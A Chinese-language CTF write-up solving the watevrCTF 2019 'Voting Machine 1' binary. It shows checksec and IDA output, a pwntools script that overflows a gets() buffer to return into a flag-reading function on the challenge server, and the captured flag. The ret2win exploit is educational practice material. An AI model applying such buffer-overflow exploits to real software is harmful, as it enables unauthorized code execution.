checksec

┌──(root㉿Sonder)-[/mnt/d]
└─# checksec '[watevrCTF 2019]Voting Machine 1'
[*] '/mnt/d/[watevrCTF 2019]Voting Machine 1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

┌──(root㉿Sonder)-[/mnt/d]
└─# file '[watevrCTF 2019]Voting Machine 1'
[watevrCTF 2019]Voting Machine 1: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=0e647f48bd36f15e866166910d10dd173fb0fcf6, not stripped

ida

int __fastcall main(int argc, const char **argv, const char **envp)
{
  char v4[2]; // [rsp+Eh] [rbp-2h] BYREF #栈溢出，只用看rbp后与0的差值即可

  signal(14, (__sighandler_t)sig);
  alarm(0x28u);
  puts("Hello and welcome to \x1B[3mour\x1B[23m voting application!");
  puts("Today's vote will be regarding the administration of");
  puts("watevr CTF.");
  puts("the voting range is 0 to 10. 0 being the worst possible and 10 being the best possible.");
  puts("Thanks!");
  printf("Vote: ");
  fflush(_bss_start);
  gets(v4);# 危险函数
  puts("Thanks for voting!");
  return 0;
}

单击函数function区域->导航栏Search->search来搜索字符串，来寻找提权函数system，但是未找到，搜索flag

void __noreturn super_secret_function()
{
  FILE *stream; // [rsp+0h] [rbp-10h]
  char i; // [rsp+Fh] [rbp-1h]

  stream = fopen("/home/ctf/flag.txt", "r");
  if ( !stream )
  {
    puts("Cannot open flag.txt");
    exit(1);
  }
  for ( i = fgetc(stream); i != -1; i = fgetc(stream) )
    putchar(i);
  fclose(stream);
  exit(0);
}

 # 这里是通过字节流读取文件内容，并输出，所以将该函数的地址放到payload中就好

.text:0000000000400807
.text:0000000000400807 ; =============== S U B R O U T I N E =======================================
.text:0000000000400807
.text:0000000000400807 ; Attributes: noreturn bp-based frame
.text:0000000000400807
.text:0000000000400807                 public super_secret_function
.text:0000000000400807 super_secret_function proc near
.text:0000000000400807
.text:0000000000400807 stream          = qword ptr -10h
.text:0000000000400807 var_1           = byte ptr -1
.text:0000000000400807
.text:0000000000400807 ; __unwind {
.text:0000000000400807                 push    rbp
.text:0000000000400808                 mov     rbp, rsp
.text:000000000040080B                 sub     rsp, 10h
.text:000000000040080F                 lea     rsi, modes      ; "r"
.text:0000000000400816                 lea     rdi, filename   ; "/home/ctf/flag.txt"
.text:000000000040081D                 call    _fopen
.text:0000000000400822                 mov     [rbp+stream], rax
.text:0000000000400826                 cmp     [rbp+stream], 0
.text:000000000040082B                 jnz     short loc_400843
.text:000000000040082D                 lea     rdi, s          ; "Cannot open flag.txt"
.text:0000000000400834                 call    _puts
.text:0000000000400839                 mov     edi, 1          ; status
.text:000000000040083E                 call    _exit

得知该函数的开始地址为400807

attack.py

from pwn import *


def attack5(url, port):
    p = remote(url, port)
    payload = b'a'*(0x2)*1 + p64(0x400807)
    # payload中字符'a'的个数应该*2，即rbp后与0的差值，而不是*(16)，rbp与rsp差值
    p.sendline(payload)
    p.interactive()


if __name__ == '__main__':
    url = 'node1.anna.nssctf.cn'
    port = 28081
    attack5(url, port)

获取flag

payload = b'a'*(0x16)*1 + p64(0x400807)时的情况，也可以换成其它数字试试，暂时只有2是能成功劫持程序的

"C:\Program Files\Python3\python310\python.exe" D:\Code_pycharm\pwn_exp\VotingMachine_exp.py 
[x] Opening connection to node1.anna.nssctf.cn on port 28081
[x] Opening connection to node1.anna.nssctf.cn on port 28081: Trying 43.143.7.97
[+] Opening connection to node1.anna.nssctf.cn on port 28081: Done
[*] Switching to interactive mode
Hello and welcome to our voting application!
Today's vote will be regarding the administration of
watevr CTF.
the voting range is 0 to 10. 0 being the worst possible and 10 being the best possible.
Thanks!
Vote: timeout: the monitored command dumped core
[*] Got EOF while reading in interactive

payload = b'a'*(0x2)*1 + p64(0x400807)时的情况

"C:\Program Files\Python3\python310\python.exe" D:\Code_pycharm\pwn_exp\VotingMachine_exp.py 
[x] Opening connection to node1.anna.nssctf.cn on port 28081
[x] Opening connection to node1.anna.nssctf.cn on port 28081: Trying 43.143.7.97
[+] Opening connection to node1.anna.nssctf.cn on port 28081: Done
[*] Switching to interactive mode
Hello and welcome to our voting application!
Today's vote will be regarding the administration of
watevr CTF.
the voting range is 0 to 10. 0 being the worst possible and 10 being the best possible.
Thanks!
Vote: Thanks for voting!
NSSCTF{8acda60a-d894-4755-8e12-ce449607a746}
[*] Got EOF while reading in interactive